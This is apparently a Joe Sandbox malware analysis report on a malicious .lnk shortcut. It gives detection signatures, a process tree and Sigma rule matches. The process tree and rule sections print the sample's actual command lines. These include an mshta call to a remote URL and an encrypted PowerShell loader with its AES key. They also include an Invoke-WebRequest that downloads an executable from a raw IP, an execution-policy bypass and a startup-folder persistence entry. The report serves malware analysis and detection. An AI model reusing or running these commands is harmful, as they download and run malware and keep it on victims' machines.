Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
R4qP4YM0QX.lnk

Overview

General Information

Sample name:R4qP4YM0QX.lnk
renamed because original name is a hash value
Original sample name:c994e4260593f7a34502021234dae6a9.lnk
Analysis ID:1577882
MD5:c994e4260593f7a34502021234dae6a9
SHA1:79ce5393d4fa09d39588aca57653b65e46bceb3b
SHA256:f87591ca3e590371796ced4bd9df58da5dc7822faae2520886470d1307b69db9
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 5336 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 1476 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$KUtXL.Length)); & $mhREwMEES.Substring(0,3) $mhREwMEES.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msedge.exe (PID: 7280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 7492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • PefjSkkhb.exe (PID: 7052 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
        • powershell.exe (PID: 5612 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9152 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 9160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Guard.exe (PID: 416 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
      • cmd.exe (PID: 7052 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7508 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 7816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8416 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8648 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8660 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • msedge.exe (PID: 9120 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 6244 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 612INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1aaa74:$b1: ::WriteAllBytes(
  • 0x1ab223:$b1: ::WriteAllBytes(
  • 0xc23:$b3: ::UTF8.GetString(
  • 0x1948:$b3: ::UTF8.GetString(
  • 0x2535:$b3: ::UTF8.GetString(
  • 0x86cf:$b3: ::UTF8.GetString(
  • 0x929b:$b3: ::UTF8.GetString(
  • 0x33c59:$b3: ::UTF8.GetString(
  • 0x34841:$b3: ::UTF8.GetString(
  • 0x35634:$b3: ::UTF8.GetString(
  • 0x363db:$b3: ::UTF8.GetString(
  • 0x3d986:$b3: ::UTF8.GetString(
  • 0x3e552:$b3: ::UTF8.GetString(
  • 0x3f127:$b3: ::UTF8.GetString(
  • 0x41277:$b3: ::UTF8.GetString(
  • 0x41ca3:$b3: ::UTF8.GetString(
  • 0x68be1:$b3: ::UTF8.GetString(
  • 0x68d4d:$b3: ::UTF8.GetString(
  • 0x8463b:$b3: ::UTF8.GetString(
  • 0x84c27:$b3: ::UTF8.GetString(
  • 0x1b0233:$b3: ::UTF8.GetString(

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9152, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 416, ProcessName: Guard.exe
Sigma detected: Execution of Powershell Script in Public Folder
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 9152, ProcessName: powershell.exe
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH, ProcessId: 1476, ProcessName: mshta.exe
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 9152, ProcessName: powershell.exe
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7052, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 5612, ProcessName: powershell.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$K
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7448, ProcessName: wscript.exe
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5612, TargetFilename: C:\Users\Public\Guard.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$K
